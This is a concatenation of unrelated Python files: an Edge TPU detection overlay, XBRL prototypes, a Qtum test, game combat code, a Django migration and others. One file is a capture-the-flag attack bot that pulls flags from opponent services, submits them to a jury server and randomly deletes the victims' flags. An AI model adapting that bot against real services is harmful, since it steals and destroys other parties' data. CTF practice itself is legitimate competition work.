from edgetpu.detection.engine import DetectionEngine
from . import svg
from . import utils
from .apps import run_app
CSS_STYLES = str(svg.CssStyle({'.back': svg.Style(fill='black',
stroke='black',
stroke_width='0.5em'),
'.bbox': svg.Style(fill_opacity=0.0,
stroke_width='0.1em')}))
BBox = collections.namedtuple('BBox', ('x', 'y', 'w', 'h'))
BBox.area = lambda self: self.w * self.h
BBox.scale = lambda self, sx, sy: BBox(x=self.x * sx, y=self.y * sy,
w=self.w * sx, h=self.h * sy)
BBox.__str__ = lambda self: 'BBox(x=%.2f y=%.2f w=%.2f h=%.2f)' % self
Object = collections.namedtuple('Object', ('id', 'label', 'score', 'bbox'))
Object.__str__ = lambda self: 'Object(id=%d, label=%s, score=%.2f, %s)' % self
#cred = credentials.Certificate('/usr/lib/python3/dist-packages/edgetpuvision/serviceAccount.json')
#firebase_admin.initialize_app(cred)
#db = firestore.client()
def size_em(length):
return '%sem' % str(0.6 * (length + 1))
def color(i, total):
return tuple(int(255.0 * c) for c in colorsys.hsv_to_rgb(i / total, 1.0, 1.0))
def make_palette(keys):
return {key : svg.rgb(color(i, len(keys))) for i, key in enumerate(keys)}
def make_get_color(color, labels):
if color:
return lambda obj_id: color
if labels:
palette = make_palette(labels.keys())
return lambda obj_id: palette[obj_id]
return lambda obj_id: 'white'
def overlay(title, objs, get_color, inference_time, inference_rate, layout):
x0, y0, width, height = layout.window
font_size = 0.03 * height
defs = svg.Defs()
defs += CSS_STYLES
doc = svg.Svg(width=width, height=height,
viewBox='%s %s %s %s' % layout.window,
font_size=font_size, font_family='monospace', font_weight=500)
doc += defs
for obj in objs:
percent = int(100 * obj.score)
if obj.label:
caption = '%d%% %s' % (percent, obj.label)
else:
caption = '%d%%' % percent
x, y, w, h = obj.bbox.scale(*layout.size)
color = get_color(obj.id)
doc += svg.Rect(x=x, y=y, width=w, height=h,
style='stroke:%s' % color, _class='bbox')
doc += svg.Rect(x=x, y=y+h ,
width=size_em(len(caption)), height='1.2em', fill=color)
t = svg.Text(x=x, y=y+h, fill='black')
t += svg.TSpan(caption, dy='1em')
doc += t
ox = x0 + 20
oy1, oy2 = y0 + 20 + font_size, y0 + height - 20
# Title
if title:
doc += svg.Rect(x=0, y=0, width=size_em(len(title)), height='1em',
transform='translate(%s, %s) scale(1,-1)' % (ox, oy1), _class='back')
doc += svg.Text(title, x=ox, y=oy1, fill='white')
# Info
lines = [
'Objects: %d' % len(objs),
'Inference time: %.2f ms (%.2f fps)' % (inference_time * 1000, 1.0 / inference_time)
]
for i, line in enumerate(reversed(lines)):
y = oy2 - i * 1.7 * font_size
doc += svg.Rect(x=0, y=0, width=size_em(len(line)), height='1em',
transform='translate(%s, %s) scale(1,-1)' % (ox, y), _class='back')
doc += svg.Text(line, x=ox, y=y, fill='white')
return str(doc)
def convert(obj, labels):
x0, y0, x1, y1 = obj.bounding_box.flatten().tolist()
return Object(id=obj.label_id,
label=labels[obj.label_id] if labels else None,
score=obj.score,
bbox=BBox(x=x0, y=y0, w=x1 - x0, h=y1 - y0))
def print_results(inference_rate, objs):
print('\nInference (rate=%.2f fps):' % inference_rate)
for i, obj in enumerate(objs):
print(' %d: %s, area=%.2f' % (i, obj, obj.bbox.area()))
def render_gen(args):
fps_counter = utils.avg_fps_counter(30)
engines, titles = utils.make_engines(args.model, DetectionEngine)
assert utils.same_input_image_sizes(engines)
engines = itertools.cycle(engines)
engine = next(engines)
labels = utils.load_labels(args.labels) if args.labels else None
filtered_labels = set(l.strip() for l in args.filter.split(',')) if args.filter else None
get_color = make_get_color(args.color, labels)
draw_overlay = True
yield utils.input_image_size(engine)
output = None
while True:
tensor, layout, command = (yield output)
inference_rate = next(fps_counter)
if draw_overlay:
start = time.monotonic()
objs = engine .detect_with_input_tensor(tensor, threshold=args.threshold, top_k=args.top_k)
inference_time = time.monotonic() - start
objs = [convert(obj, labels) for obj in objs]
#objx,objy = [convert_xy(obj) for obj in objs]
if labels and filtered_labels:
objs = [obj for obj in objs if obj.label in filtered_labels]
objs = [obj for obj in objs if args.min_area <= obj.bbox.area() <= args.max_area]
if args.print:
print_results(inference_rate, objs)
#if objs:
# string = ""
# string_id = ""
# for i in range(len(objs)):
# socre = objs[i][2]
# if socre > 0.5:
# objid = objs[i][0]
# objx = objs[i][3][0]
# objy = objs[i][3][1]
# objw = objs[i][3][2]
# objh = objs[i][3][3]
# x = ((objx+objx+objw)/2)*1280
# y = ((objy+objy+objh)/2)*720
# if i == (len(objs)-1):
# string = string+(str(round(x,3))+","+str(round(y,3)))
# string_id = string_id+(str(objid)+" ")
# else:
# string = string+(str(round(x,3))+","+str(round(y,3))+" ")
# string_id = string_id+(str(objid)+" ")
# if string:
# now = datetime.datetime.now()
# thistime = now.strftime('%H%M%S%f')[:-3]
# print(now.strftime('%H%M%S%f')[:-3])
# print(string)
# print(string_id)
# doc = {
# 'label':string_id,
# 'positsion':string,
# 'timeid':thistime
# }
# doc_ref = db.collection("time").document(thistime)
# doc_ref.set(doc)
title = titles[engine]
output = overlay(title, objs, get_color, inference_time, inference_rate, layout)
else:
output = None
if command == 'o':
draw_overlay = not draw_overlay
elif command == 'n':
engine = next(engines)
def add_render_gen_args(parser):
parser.add_argument('--model',
help='.tflite model path', required=True)
parser.add_argument('--labels',
help='labels file path')
parser.add_argument('--top_k', type=int, default=50,
help='Max number of objects to detect')
parser.add_argument('--threshold', type=float, default=0.1,
help='Detection threshold')
parser.add_argument('--min_area', type=float, default=0.0,
help='Min bounding box area')
parser.add_argument('--max_area', type=float, default=1.0,
help='Max bounding box area')
parser.add_argument('--filter', default=None,
help='Comma-separated list of allowed labels')
parser.add_argument('--color', default=None,
help='Bounding box display color'),
parser.add_argument('--print', default=False, action='store_true',
help='Print inference results')
def main():
run_app(add_render_gen_args, render_gen)
if __name__ == '__main__':
main()
|
py | 1a38c4550758e90fcf61290d64f1a0db82a9c099 | from arelle import XmlUtil, XbrlConst
from arelle.ModelValue import QName
from arelle.XmlValidate import VALID
from collections import defaultdict
import decimal, os
ModelDocument = None
class LinkPrototype(): # behaves like a ModelLink for relationship prototyping
def __init__(self, modelDocument, parent, qname, role):
self.modelDocument = modelDocument
self._parent = parent
self.modelXbrl = modelDocument.modelXbrl
self.qname = self.elementQname = qname
self.role = role
# children are arc and loc elements or prototypes
self.childElements = []
self.text = self.textValue = None
self.attributes = {"{http://www.w3.org/1999/xlink}type":"extended"}
if role:
self.attributes["{http://www.w3.org/1999/xlink}role"] = role
self.labeledResources = defaultdict(list)
def clear(self):
self.__dict__.clear() # dereference here, not an lxml object, don't use superclass clear()
def __iter__(self):
return iter(self.childElements)
def getparent(self):
return self._parent
def iterchildren(self):
return iter(self.childElements)
def get(self, key, default=None):
return self.attributes.get(key, default)
def __getitem(self, key):
return self.attributes[key]
class LocPrototype():
def __init__(self, modelDocument, parent, label, locObject, role=None):
self.modelDocument = modelDocument
self._parent = parent
self.modelXbrl = modelDocument.modelXbrl
self.qname = self.elementQname = XbrlConst.qnLinkLoc
self.text = self.textValue = None
# children are arc and loc elements or prototypes
self.attributes = {"{http://www.w3.org/1999/xlink}type":"locator",
"{http://www.w3.org/1999/xlink}label":label}
# add an href if it is a 1.1 id
if isinstance(locObject,_STR_BASE): # it is an id
self.attributes["{http://www.w3.org/1999/xlink}href"] = "#" + locObject
if role:
self.attributes["{http://www.w3.org/1999/xlink}role"] = role
self.locObject = locObject
def clear(self):
self.__dict__.clear() # dereference here, not an lxml object, don't use superclass clear()
@property
def xlinkLabel(self):
return self.attributes.get("{http://www.w3.org/1999/xlink}label")
def dereference(self):
if isinstance(self.locObject,_STR_BASE): # dereference by ID
return self.modelDocument.idObjects[self.locObject]
else: # it's an object pointer
return self.locObject
def getparent(self):
return self._parent
def get(self, key, default=None):
return self.attributes.get(key, default)
def __getitem(self, key):
return self.attributes[key]
class ArcPrototype():
def __init__(self, modelDocument, parent, qname, fromLabel, toLabel, linkrole, arcrole, order="1"):
self.modelDocument = modelDocument
self._parent = parent
self.modelXbrl = modelDocument.modelXbrl
self.qname = self.elementQname = qname
self.linkrole = linkrole
self.arcrole = arcrole
self.order = order
self.text = self.textValue = None
# children are arc and loc elements or prototypes
self.attributes = {"{http://www.w3.org/1999/xlink}type":"arc",
"{http://www.w3.org/1999/xlink}from": fromLabel,
"{http://www.w3.org/1999/xlink}to": toLabel,
"{http://www.w3.org/1999/xlink}arcrole": arcrole}
# must look validated (because it can't really be validated)
self.xValid = VALID
self.xValue = self.sValue = None
self.xAttributes = {}
@property
def orderDecimal(self):
return decimal.Decimal(self.order)
def clear(self):
self.__dict__.clear() # dereference here, not an lxml object, don't use superclass clear()
def getparent(self):
return self._parent
def get(self, key, default=None):
return self.attributes.get(key, default)
def items(self):
return self.attributes.items()
def __getitem(self, key):
return self.attributes[key]
class DocumentPrototype():
def __init__(self, modelXbrl, uri, base=None, referringElement=None, isEntry=False, isDiscovered=False, isIncluded=None, namespace=None, reloadCache=False, **kwargs):
global ModelDocument
if ModelDocument is None:
from arelle import ModelDocument
self.modelXbrl = modelXbrl
self.skipDTS = modelXbrl.skipDTS
self.modelDocument = self
if referringElement is not None:
if referringElement.localName == "schemaRef":
self.type = ModelDocument.Type.SCHEMA
elif referringElement.localName == "linkbaseRef":
self.type = ModelDocument.Type.LINKBASE
else:
self.type = ModelDocument.Type.UnknownXML
else:
self.type = ModelDocument.Type.UnknownXML
normalizedUri = modelXbrl.modelManager.cntlr.webCache.normalizeUrl(uri, base)
self.filepath = modelXbrl.modelManager.cntlr.webCache.getfilename(normalizedUri, filenameOnly=True)
self.uri = modelXbrl.modelManager.cntlr.webCache.normalizeUrl(self.filepath)
self.basename = os.path.basename(self.filepath)
self.targetNamespace = None
self.referencesDocument = {}
self.hrefObjects = []
self.schemaLocationElements = set()
self.referencedNamespaces = set()
self.inDTS = False
self.xmlRootElement = None
def clear(self):
self.__dict__.clear() # dereference here, not an lxml object, don't use superclass clear()
|
py | 1a38c49c56dbe4b6f1ad211cf2d95a703b03c933 | #!/usr/bin/env python3
from test_framework.test_framework import BitcoinTestFramework
from test_framework.util import *
from test_framework.script import *
from test_framework.mininode import *
from test_framework.address import *
from test_framework.qtum import *
import sys
import random
import time
class QtumTransactionPrioritizationTest(BitcoinTestFramework):
def __init__(self):
super().__init__()
self.setup_clean_chain = True
self.num_nodes = 1
def setup_network(self, split=False):
self.nodes = start_nodes(self.num_nodes, self.options.tmpdir, [['-staking=1', '-rpcmaxgasprice=10000000']])
self.is_network_split = False
self.node = self.nodes[0]
def restart_node(self):
stop_nodes(self.nodes)
self.nodes = start_nodes(self.num_nodes, self.options.tmpdir, [['-staking=1', '-rpcmaxgasprice=10000000']])
self.node = self.nodes[0]
def stake_or_mine(self, old_block_count=None, use_staking=False):
# Since staking is switched on by default, if a block has been staked return that block's hash
if self.node.getblockcount() > old_block_count:
return self.node.getbestblockhash()
if use_staking:
if not old_block_count:
old_block_count = self.node.getblockcount()
while old_block_count == self.node.getblockcount():
time.sleep(0.1)
return self.node.getbestblockhash()
else:
return self.node.generate(1)[0]
def send_transaction_with_fee(self, fee):
for unspent in self.node.listunspent():
if unspent['amount'] >= 10000:
break
addr = self.node.getnewaddress()
haddr = p2pkh_to_hex_hash(addr)
tx = CTransaction()
tx.vin = [CTxIn(COutPoint(int(unspent['txid'], 16), unspent['vout']), nSequence=0)]
amount = int((float(str(unspent['amount'])) - fee)*COIN)
tx.vout = [CTxOut(amount, scriptPubKey=CScript([OP_DUP, OP_HASH160, hex_str_to_bytes(haddr), OP_EQUALVERIFY, OP_CHECKSIG]))]
tx_hex_signed = self.node.signrawtransaction(bytes_to_hex_str(tx.serialize()))['hex']
return self.node.sendrawtransaction(tx_hex_signed)
# Creates and op_call tx that calls the fallback function of the only contract that should be in existance
def send_op_call_transaction_with_gas_price(self, contract_address, gas_price, spends_txid=None, spends_vout=None):
gas_limit = 1000000
if not spends_txid:
unspent = self.node.listunspent()[0]
spends_txid = unspent['txid']
spends_vout = unspent['vout']
# Fetch the amount of the vout of the txid that we are spending
spends_tx = self.node.getrawtransaction(spends_txid, True)
for output in spends_tx['vout']:
if output['n'] == spends_vout:
break
else:
# That output does not exist...
assert(False)
addr = self.node.getnewaddress()
haddr = p2pkh_to_hex_hash(addr)
tx = CTransaction()
tx.vin = [CTxIn(COutPoint(int(spends_txid, 16), spends_vout), nSequence=0)]
tx.vout.append(CTxOut(0, scriptPubKey=CScript([b"\x04", CScriptNum(gas_limit), CScriptNum(int(gas_price*COIN)), b"\x00", hex_str_to_bytes(contract_address), OP_CALL])))
change = int((float(str(output['value'])) - gas_price*gas_limit) * COIN)
tx.vout.append(CTxOut(change, scriptPubKey=CScript([OP_DUP, OP_HASH160, hex_str_to_bytes(haddr), OP_EQUALVERIFY, OP_CHECKSIG])))
tx_hex_signed = self.node.signrawtransaction(bytes_to_hex_str(tx.serialize()))['hex']
return self.node.sendrawtransaction(tx_hex_signed)
def send_op_call_outputs_with_gas_price(self, contract_address, gas_prices, spends_txid=None, spends_vout=None):
gas_limit = 100000
if not spends_txid:
for unspent in self.node.listunspent():
if unspent['amount'] == 20000:
spends_txid = unspent['txid']
spends_vout = unspent['vout']
break
# Fetch the amount of the vout of the txid that we are spending
spends_tx = self.node.getrawtransaction(spends_txid, True)
for output in spends_tx['vout']:
if output['n'] == spends_vout:
break
else:
# That output does not exist...
assert(False)
addr = self.node.getnewaddress()
haddr = p2pkh_to_hex_hash(addr)
tx = CTransaction()
tx.vin = [CTxIn(COutPoint(int(spends_txid, 16), spends_vout), nSequence=0)]
for gas_price in gas_prices:
tx.vout.append(CTxOut(0, scriptPubKey=CScript([b"\x04", CScriptNum(gas_limit), CScriptNum(int(gas_price*COIN)), b"\x00", hex_str_to_bytes(contract_address), OP_CALL])))
change = int((float(str(output['value'])) - sum(gas_prices)*gas_limit) * COIN)
tx.vout.append(CTxOut(change, scriptPubKey=CScript([OP_DUP, OP_HASH160, hex_str_to_bytes(haddr), OP_EQUALVERIFY, OP_CHECKSIG])))
tx_hex_signed = self.node.signrawtransaction(bytes_to_hex_str(tx.serialize()))['hex']
return self.node.sendrawtransaction(tx_hex_signed)
def verify_contract_txs_are_added_last_test(self, with_restart=False, use_staking=False):
# Set the fee really high so that it should normally be added first if we only looked at the fee/size
contract_txid = self.node.createcontract("00", 4*10**6, 0.0001)['txid']
normal_txid = self.node.sendtoaddress(self.node.getnewaddress(), 1)
old_block_count = self.node.getblockcount()
if with_restart:
self.restart_node()
block_hash = self.stake_or_mine(old_block_count=old_block_count, use_staking=use_staking)
block_txs = self.node.getblock(block_hash)['tx']
if use_staking:
block_txs.pop(1) # Ignore the coinstake tx so we can reuse the tests for both pow and pos
assert_equal(len(block_txs), 3)
assert_equal(block_txs.index(normal_txid), 1)
assert_equal(block_txs.index(contract_txid), 2)
# Verifies that contract transactions are correctly ordered by descending (minimum among outputs) gas price and ascending size
# Sends 7 txs in total
def verify_contract_txs_internal_order_test(self, with_restart=False, use_staking=False):
contract_address = list(self.node.listcontracts().keys())[0]
sender = self.node.getnewaddress()
tx4 = self.send_op_call_outputs_with_gas_price(contract_address, [0.0001])
tx5 = self.send_op_call_outputs_with_gas_price(contract_address, [0.0001, 0.0001])
tx3 = self.send_op_call_outputs_with_gas_price(contract_address, [0.00010001])
tx6 = self.send_op_call_outputs_with_gas_price(contract_address, [0.0001, 0.00010001, 0.00010001])
tx2 = self.send_op_call_outputs_with_gas_price(contract_address, [0.002])
tx1 = self.node.sendtoaddress(sender, 1)
tx7 = self.node.sendtocontract(contract_address, "00", 0, 100000, "0.000001", sender)['txid']
old_block_count = self.node.getblockcount()
if with_restart:
self.restart_node()
# Ordering based on gas_price should now be
block_hash = self.stake_or_mine(old_block_count=old_block_count, use_staking=use_staking)
block = self.node.getblock(block_hash)
block_txs = block['tx']
if use_staking:
block_txs.pop(1) # Ignore the coinstake tx so we can reuse the tests for both pow and pos
assert_equal(block_txs[1:], [tx1, tx2, tx3, tx4, tx5, tx6, tx7])
# In the case of an ancestor chain in the mempool such that a contract tx spends another normal tx that is in the mempool
# the contract tx should still be added last while the tx it spends should be added based on it's fee ordering.
# In this test we create 4 txs.
# 1. a normal tx has a fee > tx2 and tx3
# 2. a ancestor normal tx that will be spent by the contract tx has a fee < tx1 and tx3 >
# 3. a normal tx with a fee < tx2 and tx3
# 4. a op call contract tx spending tx2.
# Expected transaction ordering in the block should thus be tx1, tx2, tx3, tx4
def verify_ancestor_chain_with_contract_txs_test(self, with_restart=False, use_staking=False):
contract_address = list(self.node.listcontracts().keys())[0]
tx1 = self.send_transaction_with_fee(0.01)
tx2 = self.send_transaction_with_fee(0.005)
tx3 = self.send_transaction_with_fee(0.001)
# Create a contract tx (4) that spends tx3
tx4 = self.send_op_call_transaction_with_gas_price(contract_address, 0.001, spends_txid=tx2, spends_vout=0)
# Make sure that all txs are in the mempool
assert_equal(len(self.node.getrawmempool()), 4)
old_block_count = self.node.getblockcount()
if with_restart:
self.restart_node()
block_hash = self.stake_or_mine(old_block_count=old_block_count, use_staking=use_staking)
block_txs = self.node.getblock(block_hash)['tx']
if use_staking:
block_txs.pop(1) # Ignore the coinstake tx so we can reuse the tests for both pow and pos
assert_equal(len(block_txs), 5)
assert_equal(block_txs[1], tx1)
assert_equal(block_txs[2], tx2)
assert_equal(block_txs[3], tx3)
assert_equal(block_txs[4], tx4)
# Creates two different contract tx chains.
def verify_contract_ancestor_txs_test(self, with_restart=False, use_staking=False):
contract_address = list(self.node.listcontracts().keys())[0]
for unspent in self.node.listunspent():
if unspent['amount'] > 10000:
break
address = self.node.getnewaddress()
expected_tx_order = []
for (expected_tx_index, gas_price) in [(1, 60), (2, 50), (7, 40), (8, 50)]:
tx = CTransaction()
tx.vin = [CTxIn(COutPoint(int(unspent['txid'], 16), unspent['vout']), nSequence=0)]
tx.vout = [
CTxOut(0, scriptPubKey=CScript([b"\x04", CScriptNum(30000), CScriptNum(gas_price), b"\x00", hex_str_to_bytes(contract_address), OP_CALL])),
CTxOut(int((unspent['amount'] - Decimal('0.1'))*COIN), scriptPubKey=CScript([OP_DUP, OP_HASH160, hex_str_to_bytes(p2pkh_to_hex_hash(address)), OP_EQUALVERIFY, OP_CHECKSIG]))
]
tx_raw = self.node.signrawtransaction(bytes_to_hex_str(tx.serialize()))['hex']
# Make the next vin refer to this tx.
unspent['amount'] -= Decimal('0.1')
unspent['txid'] = self.node.sendrawtransaction(tx_raw)
unspent['vout'] = 1
expected_tx_order.append((expected_tx_index, unspent['txid']))
for unspent in self.node.listunspent():
if unspent['amount'] == 20000 and unspent['address'] != address:
break
# The list of tuples specifies (expected position in block txs, gas_price)
for (expected_tx_index, gas_price) in [(3, 49), (4, 48), (5, 47), (6, 46)]:
tx = CTransaction()
tx.vin = [CTxIn(COutPoint(int(unspent['txid'], 16), unspent['vout']), nSequence=0)]
tx.vout = [
CTxOut(0, scriptPubKey=CScript([b"\x04", CScriptNum(30000), CScriptNum(gas_price), b"\x00", hex_str_to_bytes(contract_address), OP_CALL])),
CTxOut(int((unspent['amount'] - Decimal('0.1'))*COIN), scriptPubKey=CScript([OP_DUP, OP_HASH160, hex_str_to_bytes(p2pkh_to_hex_hash(address)), OP_EQUALVERIFY, OP_CHECKSIG]))
]
tx_raw = self.node.signrawtransaction(bytes_to_hex_str(tx.serialize()))['hex']
# Make the next vin refer to this tx.
unspent['amount'] -= Decimal('0.1')
unspent['txid'] = self.node.sendrawtransaction(tx_raw)
unspent['vout'] = 1
expected_tx_order.append((expected_tx_index, unspent['txid']))
old_block_count = self.node.getblockcount()
if with_restart:
self.restart_node()
block_hash = self.stake_or_mine(old_block_count=old_block_count, use_staking=use_staking)
block_txs = self.node.getblock(block_hash)['tx']
if use_staking:
block_txs.pop(1) # Ignore the coinstake tx so we can reuse the tests for both pow and pos
# Even though the gas prices differ, since they the ancestor txs must be included before the child txs we expect the order by which they were sent,
# always chosing the tx with the highest gas price whose ancestors have already been included.
for (expected_tx_index, txid) in expected_tx_order:
assert_equal(block_txs[expected_tx_index], txid)
def run_test(self):
self.node.generate(500+COINBASE_MATURITY)
print("running pow tests")
self.verify_contract_txs_are_added_last_test()
self.verify_ancestor_chain_with_contract_txs_test()
self.verify_contract_txs_internal_order_test()
self.verify_contract_ancestor_txs_test()
# Verify that the mempool is empty before running more tests
assert_equal(self.node.getrawmempool(), [])
# Redo the testing and check that the mempool is correctly ordered after a restart
print("running pow tests with restart")
self.verify_contract_txs_are_added_last_test(with_restart=True)
self.verify_ancestor_chain_with_contract_txs_test(with_restart=True)
self.verify_contract_txs_internal_order_test(with_restart=True)
self.verify_contract_ancestor_txs_test(with_restart=True)
# Verify that the mempool is empty before running more tests
assert_equal(self.node.getrawmempool(), [])
print("running pos tests")
self.verify_contract_txs_are_added_last_test(use_staking=True)
self.verify_ancestor_chain_with_contract_txs_test(use_staking=True)
self.verify_contract_txs_internal_order_test(use_staking=True)
self.verify_contract_ancestor_txs_test(use_staking=True)
# Verify that the mempool is empty before running more tests
assert_equal(self.node.getrawmempool(), [])
print("running pos tests with restart")
self.verify_contract_txs_are_added_last_test(with_restart=True, use_staking=True)
self.verify_ancestor_chain_with_contract_txs_test(with_restart=True, use_staking=True)
self.verify_contract_txs_internal_order_test(with_restart=True, use_staking=True)
self.verify_contract_ancestor_txs_test(with_restart=True, use_staking=True)
if __name__ == '__main__':
QtumTransactionPrioritizationTest().main()
|
py | 1a38c513ef252cbcb654ac45b85cf1eb7f9ed284 | from app.engine.combat.solver import CombatPhaseSolver
from app.engine import skill_system, item_system
from app.engine.game_state import game
from app.engine.combat.simple_combat import SimpleCombat
from app.engine.objects.unit import UnitObject
from app.engine.objects.item import ItemObject
class BaseCombat(SimpleCombat):
alerts: bool = True
"""
Handles in base and in prep screen "use" of items
"""
def __init__(self, attacker: UnitObject, main_item: ItemObject,
main_target: UnitObject, script):
self.attacker = attacker
self.defender = main_target
self.main_item = main_item
self.def_item = None
if self.defender:
self.def_item = self.defender.get_weapon()
self.state_machine = CombatPhaseSolver(
self.attacker, self.main_item, [self.main_item],
[self.defender], [[]], [self.defender.position],
self.defender, self.def_item, script)
self.full_playback = []
self.playback = []
self.actions = []
self.start_combat()
while self.state_machine.get_state():
self.actions, self.playback = self.state_machine.do()
self.full_playback += self.playback
self._apply_actions()
self.state_machine.setup_next_state()
def start_combat(self):
game.events.trigger('combat_start', self.attacker, self.defender, self.main_item, self.attacker.position)
skill_system.pre_combat(self.full_playback, self.attacker, self.main_item, self.defender, 'attack')
if self.attacker is not self.defender:
skill_system.pre_combat(self.full_playback, self.defender, self.def_item, self.attacker, 'defense')
skill_system.start_combat(self.full_playback, self.attacker, self.main_item, self.defender, 'attack')
item_system.start_combat(self.full_playback, self.attacker, self.main_item, self.defender, 'attack')
if self.attacker is not self.defender:
skill_system.start_combat(self.full_playback, self.defender, self.def_item, self.attacker, 'defense')
if self.def_item:
item_system.start_combat(self.full_playback, self.defender, self.def_item, self.attacker, 'defense')
def cleanup_combat(self):
skill_system.cleanup_combat(self.full_playback, self.attacker, self.main_item, self.defender, 'attack')
if self.attacker is not self.defender:
skill_system.cleanup_combat(self.full_playback, self.defender, self.def_item, self.attacker, 'defense')
def end_combat(self):
skill_system.end_combat(self.full_playback, self.attacker, self.main_item, self.defender, 'attack')
item_system.end_combat(self.full_playback, self.attacker, self.main_item, self.defender, 'attack')
if self.attacker is not self.defender:
skill_system.end_combat(self.full_playback, self.defender, self.def_item, self.attacker, 'defense')
if self.def_item:
item_system.end_combat(self.full_playback, self.defender, self.def_item, self.attacker, 'defense')
skill_system.post_combat(self.full_playback, self.attacker, self.main_item, self.defender, 'attack')
if self.attacker is not self.defender:
skill_system.post_combat(self.full_playback, self.defender, self.def_item, self.attacker, 'defense')
def _all_units(self) -> list:
"""
Returns list of all units taking in this combat
"""
all_units = [self.attacker]
if self.attacker is not self.defender:
all_units.append(self.defender)
return all_units
def handle_state_stack(self):
pass
|
py | 1a38c52897706d497aafa5b9bb0faa4e0f823dc5 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
def check(S,a,b):
if (a in S) and (b not in S):
return 0
if (b in S) and (a not in S):
return 0
return 1
def main():
S = str(input())
flag = 1
for a,b in [['N','S'],['E','W']]:
flag = min(check(S,a,b),flag)
if flag==1:
print('Yes')
else:
print('No')
if __name__ == '__main__':
main() |
py | 1a38c5666d4aff5204cfddf2e7902797ca12a1c7 | import subprocess
from .browser_ui import write_browser_ui
from .platform_detect import get_os_dir
filename = write_browser_ui()
os_dir = get_os_dir()
if os_dir.startswith("Ubuntu"):
subprocess.Popen(['xdg-open %s' % filename], shell=True)
else:
subprocess.Popen(['open %s' % filename], shell=True)
|
py | 1a38c66082a45a4ae76f033f462220530b4606d3 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import requests
import socket
import time
import sys
import random
import traceback
def send_flag(your_teamnum, jury_hostport, flag):
global requests
url = 'http://' + jury_hostport + '/flag?teamid=' + str(your_teamnum) + '&flag=' + flag
try:
r = requests.get(url)
print("Try send flag " + flag)
if r.status_code != 200:
print("FAIL")
print(r.text)
else:
print("OK!!!!")
except Exception as ex:
print("Could not connect to jury " + url + str(ex))
except SystemExit:
pass
def delete_flag(ip_address, port, flag_id):
try:
# print("try connect " + host + ":" + str(port))
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.settimeout(1)
s.connect((ip_address, port))
s.recv(1024)
s.send("delete\n".encode("utf-8"))
s.recv(1024)
s.send((flag_id + "\n").encode("utf-8"))
s.recv(1024)
s.close()
except socket.timeout:
print("Error(1) in delete_flag socket.timeout")
traceback.print_exc()
exit(509)
except socket.error as serr:
print("Error(2) in delete_flag " + str(serr))
traceback.print_exc()
exit(508)
except Exception as e:
print("Error(3) in delete_flag " + str(e))
traceback.print_exc()
exit(507)
return ''
def get_flag(ip_address, port, flag_id):
try:
# print("try connect " + host + ":" + str(port))
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.settimeout(1)
s.connect((ip_address, port))
s.recv(1024)
s.send("get\n".encode("utf-8"))
s.recv(1024)
s.send((flag_id + "\n").encode("utf-8"))
result = s.recv(1024)
result = result.decode("utf-8", "ignore")
flag2 = result.strip()
flag2 = flag2.split("FOUND FLAG: ")
if len(flag2) == 2:
flag2 = flag2[1]
else:
flag2 = ''
s.close()
return flag2
except socket.timeout:
print("Error(1) in get_flag socket.timeout")
traceback.print_exc()
exit(500)
except socket.error as serr:
print("Error(2) in get_flag " + str(serr))
traceback.print_exc()
exit(501)
except Exception as e:
print("Error(3) in get_flag " + str(e))
traceback.print_exc()
exit(502)
return ''
def start_attack(your_teamnum, jury_hostport, ip_address, port):
print("Start attack to (" + ip_address + ":" + str(port) + ")")
flag_ids = []
try:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.settimeout(1)
s.connect((ip_address, port))
s.recv(1024)
s.send("list\n".encode("utf-8"))
result = ""
result1 = s.recv(1024)
result1 = result1.decode("utf-8", "ignore")
while result1.strip() != "":
result1 = s.recv(1024)
result1 = result1.decode("utf-8", "ignore")
if result1.strip() == "":
break
result = result + result1
s.close()
result = result.split('\n')
for i in result:
flag_id = i.split(":")
if len(flag_id) > 1:
flag_id = flag_id[1].strip()
flag_ids.append(flag_id)
except socket.timeout:
print("Socket timeout")
traceback.print_exc()
exit(504)
except socket.error as serr:
print("Error in start_attack: " + str(serr))
traceback.print_exc()
exit(505)
except Exception as e:
print("Error in start_attack: " + str(e))
traceback.print_exc()
exit(506)
for flag_id in flag_ids:
flag = get_flag(ip_address, port, flag_id)
print(flag_id + ": " + flag)
if flag != '':
send_flag(your_teamnum, jury_hostport, flag)
# random remove flag
n = random.randint(1,100)
if n < 50:
delete_flag(ip_address, port, flag_id)
# flag = str(uuid.uuid4())
# send_flag(your_teamnum, jury_host, jury_port, flag)
jury_hostport = sys.argv[1]
your_teamnum = sys.argv[2]
attack_hosts = sys.argv[3]
attack_hosts = attack_hosts.split(",")
print(attack_hosts)
while(True):
print(" =============== ")
for hostport in attack_hosts:
victum_host = hostport.split(":")[0]
victum_port = int(hostport.split(":")[1])
start_attack(your_teamnum, jury_hostport, victum_host, victum_port)
print(hostport)
t = random.randint(1,60)
print("wait " + str(t) + " sec")
time.sleep(t) # wait t seconds before attack |
py | 1a38c6a55606545d54c19fa1647b61cbf281b252 | # Generated by Django 2.2 on 2019-04-30 16:28
from django.db import migrations
import wagtail.core.blocks
import wagtail.core.fields
import wagtail.embeds.blocks
import wagtail.images.blocks
class Migration(migrations.Migration):
dependencies = [("core", "0013_auto_20190430_0308")]
operations = [
migrations.AlterField(
model_name="articlepage",
name="body",
field=wagtail.core.fields.StreamField(
[
("paragraph", wagtail.core.blocks.RichTextBlock()),
(
"photo",
wagtail.core.blocks.StructBlock(
[
("image", wagtail.images.blocks.ImageChooserBlock()),
(
"caption",
wagtail.core.blocks.RichTextBlock(
features=["italic"], required=False
),
),
(
"size",
wagtail.core.blocks.ChoiceBlock(
choices=[
("small", "Small"),
("medium", "Medium"),
("large", "Large"),
],
help_text="Width of image in article.",
),
),
]
),
),
(
"photo_gallery",
wagtail.core.blocks.ListBlock(
wagtail.core.blocks.StructBlock(
[
(
"image",
wagtail.images.blocks.ImageChooserBlock(),
),
(
"caption",
wagtail.core.blocks.RichTextBlock(
features=["italic"], required=False
),
),
]
),
icon="image",
),
),
(
"embed",
wagtail.core.blocks.StructBlock(
[
(
"embed",
wagtail.embeds.blocks.EmbedBlock(
help_text="URL to the content to embed."
),
)
]
),
),
],
blank=True,
),
),
migrations.AlterField(
model_name="staticpage",
name="body",
field=wagtail.core.fields.RichTextField(blank=True, null=True),
),
]
|
py | 1a38c781e059c79954a2e365afb8d9e18a3ee805 | #!/usr/bin/env python3
